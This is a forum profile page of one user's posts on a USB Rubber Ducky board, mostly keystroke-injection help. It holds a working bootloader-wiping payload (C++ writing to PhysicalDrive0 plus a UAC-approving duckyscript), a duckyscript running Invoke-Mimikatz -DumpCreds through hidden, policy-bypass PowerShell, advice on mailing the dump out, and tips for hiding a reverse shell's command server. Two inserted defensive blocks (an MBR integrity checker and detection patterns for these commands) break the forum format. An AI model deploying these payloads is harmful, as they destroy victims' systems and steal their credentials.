Posts posted by ThoughtfulDev
-
be quiet! Silent Base 800 Black, No Window
ASUS Prime X370-Pro
AMD Ryzen 7 1700X
2x8GB Vengeance DDR4-3200
be quiet! Silent Loop 120mm
MSI GTX 770
Samsung 850 Evo 250GB SSD
550 Watt Corsair Semi Modular PSU (don't know the actual name rn)
Wanted to buy a new GPU for Machine Learning but prices are so damn high...
-
Did you change the keyboard layout to "es" when compiling the duckyscript?
-
Reminds me of my PyDuckGen.
But it seems like your script works ;) (I'll have a look and see if I can improve your script.)
-
I guess that this is not possible, since no driver is loaded and/or can be installed if you aren't on Win/Linux/OSX.
-
On 20.10.2017 at 2:23 PM, denisit said:
STRING ="K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS"
This is wrong: no quotes and no = are needed. It should look like this:
STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
-
13 hours ago, Dave-ee Jones said:
You could generate a random number and do a switch of some kind?
if __NUMBER__ is 1: Q STRING "IT'S 1!"
else if __NUMBER__ is 2: Q STRING "Oh boi. It's 2."
...
Down further in that page it actually gives an example of throwing a dice.
That would be possible if he were using a Bash Bunny haha :) Since the Ducky is only a HID, this won't work directly on the Ducky.
-
As far as I know the Ducky can't do that on its own. Maybe you can write a bash/batch script that copies a random key/number into your clipboard, start that, and have the Ducky just press CTRL+V to paste that random character?
-
1 hour ago, i8igmac said:
I was thinking of a Chromebook with an Intel chip. I don't see anyone talking about them here.
My wife has one with an Intel chip. I have been itching to fire up Linux. I have read its hardware works out of the box.
They are cheap.
The touch screen might perform well with GNOME Shell 3 and will give it a great tablet-style user interface...
Long battery life.
The Intel ones do work with e.g. GalliumOS (which is Ubuntu + the necessary Chromebook drivers). (I use it myself.)
-
I don't get your problem. Session 1 was opened... so just use sessions to list your sessions and interact with them.
This is basic Metasploit stuff... maybe you should have a look at Metasploit Minute.
-
Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)
I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.
CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM
1. Download the precompiled boot.exe (source code is here if you want to compile yourself):
#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]) {
    DWORD dw;
    const char *pathToBin = "boot.bin";
    // Opening the raw physical disk only works with administrator rights
    HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL,
                              FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    if (drive != INVALID_HANDLE_VALUE) {
        HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
        if (binary != INVALID_HANDLE_VALUE) {
            DWORD size = GetFileSize(binary, 0);
            if (size > 0) {
                byte *mbr = new byte[size];
                if (ReadFile(binary, mbr, size, &dw, 0)) {
                    std::cout << "Binary file successfully read!" << std::endl;
                    // Writes the image over the first sector of the disk
                    if (WriteFile(drive, mbr, size, &dw, 0)) {
                        std::cout << "First sector overwritten successfully!" << std::endl;
                    } else {
                        std::cerr << "Fatal error! Can't overwrite 1st sector!" << std::endl;
                    }
                } else {
                    std::cerr << "Error reading from binary file!" << std::endl;
                }
                delete[] mbr;
            } else {
                std::cerr << "Invalid binary file!" << std::endl;
            }
            CloseHandle(binary);
        } else {
            std::cerr << "Can't find the binary file to read from!" << std::endl;
        }
        CloseHandle(drive);
    } else {
        std::cerr << "Administrator privileges required!" << std::endl;
    }
    return 0;
}
2. Create a folder exec on your Ducky SD card and copy boot.exe into it.
3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it in DUCKY\exec\boot.bin
4. Here is the duckyscript (make sure your SD card is labelled DUCKY):
REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired UAC alt + key combo (y for yes in English, j for German etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER
I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier
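Added example, not code from the thread, from nyanmbr or from PyDuckGen: the defensive counterpart to the post above. The payload works by rewriting the first sector of the disk, so the thing a defender can do is baseline that sector and check it. The block below parses a 512-byte MBR (446 bytes of boot code, four 16-byte partition entries, the 0x55AA signature), hashes the boot code and compares it with a previously recorded hash. The sectors it checks are constructed inline (the boot-code bytes, the single NTFS partition at LBA 2048 and the "tampered" replacement are all made-up sample data); on a real machine the sector would be the first 512 bytes read from the disk device, which needs administrative rights.

```python
import hashlib
import struct

# Layout of the first sector of a BIOS/MBR disk: 446 bytes of boot code,
# a 64-byte partition table (four 16-byte entries) and the 2-byte signature.
SECTOR_SIZE = 512
BOOT_CODE_SIZE = 446
PARTITION_TABLE_OFFSET = 446
BOOT_SIGNATURE = b"\x55\xaa"


def build_sector(boot_code: bytes, partitions) -> bytes:
    """Assemble a 512-byte MBR from boot code and (bootable, type, lba, sectors) tuples.
    CHS fields are left zero; only used here to construct sample data."""
    if len(boot_code) > BOOT_CODE_SIZE:
        raise ValueError("boot code too large")
    if len(partitions) > 4:
        raise ValueError("at most four primary partitions")
    table = b"".join(
        struct.pack("<B3sB3sII", 0x80 if bootable else 0x00, b"\0\0\0",
                    ptype, b"\0\0\0", lba_start, num_sectors)
        for bootable, ptype, lba_start, num_sectors in partitions
    )
    return boot_code.ljust(BOOT_CODE_SIZE, b"\0") + table.ljust(64, b"\0") + BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> dict:
    """Split a first sector into boot-code hash, signature check and partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    partitions = []
    for i in range(4):
        status, ptype, lba_start, num_sectors = struct.unpack_from(
            "<B3xB3xII", sector, PARTITION_TABLE_OFFSET + 16 * i)
        if ptype != 0:  # partition type 0x00 marks an unused entry
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": num_sectors})
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_SIZE]).hexdigest(),
        "partitions": partitions,
    }


def check_against_baseline(sector: bytes, baseline_boot_code_sha256: str) -> str:
    """Compare a freshly read sector with the boot-code hash recorded on a known-good system."""
    info = parse_mbr(sector)
    if not info["signature_ok"]:
        return "signature_missing"
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        return "boot_code_modified"
    return "unchanged"


# Constructed sample data (not a real disk image): a made-up boot-code stub and
# one bootable NTFS (type 0x07) partition starting at LBA 2048.
GOOD_SECTOR = build_sector(b"\xfa\x33\xc0\x8e\xd0" + b"constructed-known-good-boot-code",
                           [(True, 0x07, 2048, 409600)])
# Same partition table, different boot code: what a baseline check should flag.
TAMPERED_SECTOR = build_sector(b"\xeb\x3c\x90" + b"constructed-replacement-boot-code",
                               [(True, 0x07, 2048, 409600)])
BASELINE = parse_mbr(GOOD_SECTOR)["boot_code_sha256"]

if __name__ == "__main__":
    # On a live system the sector would be the first 512 bytes read from the disk
    # device (\\.\PhysicalDrive0 on Windows, /dev/sda on Linux), which needs
    # administrative rights; the constructed sectors stand in for that here.
    for name, sector in (("good", GOOD_SECTOR), ("tampered", TAMPERED_SECTOR)):
        print(name, check_against_baseline(sector, BASELINE), parse_mbr(sector)["partitions"])
```

The check hashes only the boot-code region, so a legitimate partition-table change (resizing, adding a volume) does not trip it, while any change to the code that runs before the OS does. Recording the baseline hash off-host matters: a tool that rewrites the sector can just as easily rewrite a hash stored next to it.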
-
Nope, no solution except what you already said: Delay.
-
2 hours ago, JeepartN said:
It works now with the new SD card. However, in my script I want to use a PowerShell command that has a - in it. But when it puts in the command I get a + instead.
Try encoding with your keyboard layout (default is US).
-
You can run PowerShell and cmd without admin privs, or am I mistaken?
E.g. ctrl + r and then powershell/cmd.exe will run it without admin privs.
-
I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
-
Are you sure that PHP is enabled in your Apache or IIS webserver?
Try placing a PHP file, e.g. test.php, in the web directory root with the following content:
<?php phpinfo(); ?>
If you now visit yourwebserver/test.php you should see a table with some information if PHP is enabled.
I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz
REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"
Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
-
The c_duck_v2.1.hex is the standard TwinDuck firmware, which mounts your Ducky as a HID keyboard and USB storage device. The payload starts as soon as you plug it in. This is probably what you want to use.
-
Flash the TwinDuck firmware, which allows the Ducky to be seen as a USB storage device and a HID keyboard.
Then call your SD card 'DUCKY' and use this script:
for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
%duck% stores the drive letter of your Ducky :)
-
Use something like:
Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';
This writes the output of Invoke-Mimikatz to your temp folder in a file named yourpcname_creds.txt, which you can then read and/or even send as an email attachment if you want.
PS: the Invoke-Mimikatz script isn't hosted on Darren's webserver; use your own host.
-
As far as I know it shouldn't show any output, since it only writes a file in the current folder (e.g. /var/www/html or sth).
-
It should work as long as there are corresponding hotkeys to do the things you want :)
-
10 hours ago, Willhall996 said:
Can anyone tell me what other files, if any, are on the memory card with the inject.bin file? I lost the original card. Also, does it have to be formatted in any specific manner?
FAT32. And no, only the inject.bin, since this was just the hello world payload. As already said, use the Java encoder to encode your raw txt payload into the inject.bin.
-
I use this one to find a drive labelled DUCKY (works in Win 10/8/7):
for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
%duck% contains your ducky drive letter.
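Added example, not from the thread or from PyDuckGen, serving the drive-letter lookup posts above and the Invoke-Mimikatz post: the same command lines a payload author types are what a defender sees in process-creation telemetry, so they make a straightforward detection. The block runs three rules over constructed sample events (made-up here, in the shape of a Sysmon event 1 or Security 4688 record; the paths, host name and event ids are not real): the wmic volume/logicaldisk query piped into findstr or find, a PowerShell launch with a hidden window and an execution-policy bypass, and the Invoke-Mimikatz -DumpCreds call. The label "DUCKY" is whatever the operator chose, so the first rule keys on the shape of the query rather than on the label.

```python
import re

# Constructed process-creation events (not real log data), shaped like the
# fields a Sysmon event 1 / Security 4688 record carries.
SAMPLE_EVENTS = [
    # ordinary admin query: no pipe into findstr/find, should not alert
    {"id": 1, "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c wmic volume get driveletter, label"},
    # the label lookup from the posts above, carets still present
    {"id": 2, "parent": "cmd.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c for /f %d in (\'wmic volume get driveletter^, label^|findstr "DUCKY"\') do @set duck=%d'},
    # hidden-window PowerShell with policy bypass running the credential dump
    {"id": 3, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass \"Import-Module E:\\exec\\mimikatz.ps1;"
                "Invoke-Mimikatz -DumpCreds|Out-File 'E:\\data\\mimikatz\\HOST1_creds.txt';\""},
    # benign scheduled script: no hidden window, no bypass
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    # the logicaldisk/find variant of the same lookup
    {"id": 5, "parent": "cmd.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c for /f %a in (\'wmic logicaldisk get volumename^,name ^| find "DUCKY"\') do %a'},
]

# Each rule is a list of patterns that must all match the command line.
# PowerShell accepts unambiguous parameter prefixes (-W / -WindowStyle,
# -Exec / -ExecutionPolicy), so those patterns allow any suffix after the stem.
# Depending on how the line reaches the log, the cmd carets (^) may or may not
# still be present, so the wmic pattern tolerates both forms.
RULES = {
    "volume_label_lookup": [
        re.compile(r"wmic\s+(?:volume|logicaldisk)\s+get\s+[\w^, ]*?\^?\|\s*(?:findstr|find)\b", re.I),
    ],
    "hidden_powershell_policy_bypass": [
        re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
        re.compile(r"-w\w*\s+hidden\b", re.I),
        re.compile(r"-ex\w*\s+bypass\b", re.I),
    ],
    "invoke_mimikatz": [
        re.compile(r"invoke-mimikatz\b|-dumpcreds\b", re.I),
    ],
}


def classify(cmdline: str) -> list:
    """Return the names of all rules whose patterns all match the command line."""
    return [name for name, patterns in RULES.items()
            if all(p.search(cmdline) for p in patterns)]


def scan_events(events) -> dict:
    """Map event id -> matched rule names, for events that matched at least one rule."""
    hits = {}
    for event in events:
        matched = classify(event["cmdline"])
        if matched:
            hits[event["id"]] = matched
    return hits


if __name__ == "__main__":
    for event_id, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The second rule fires on the launch flags alone, before any script content is known, which is why the hidden-window plus bypass combination is worth alerting on even when the script name is unremarkable; the wmic rule is noisier on its own and is best treated as a correlation signal alongside a new removable-storage device appearing shortly before it.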
-
On 9.6.2017 at 5:38 PM, ItsKorma (YT) said:
I need help, I'm new to this. I just got a USB Rubber Ducky. It's a bit hard for me to get around it at the moment, but what you just said is what I'm looking for: I want to be able to view the victim's screen or control it, look at the files etc. Please help me step by step.
Sounds like you need a basic Metasploit payload (don't worry about the stealth/undetected part for now). Have a look at Metasploit Minute for tutorials about Metasploit.
Anonymous reverse shell (in Questions)
How about using Domain Fronting?
You can connect your C&C server to a VPN with port forwarding and then let the shell connect to that port on the VPN side, which will then be forwarded to your C&C... in theory.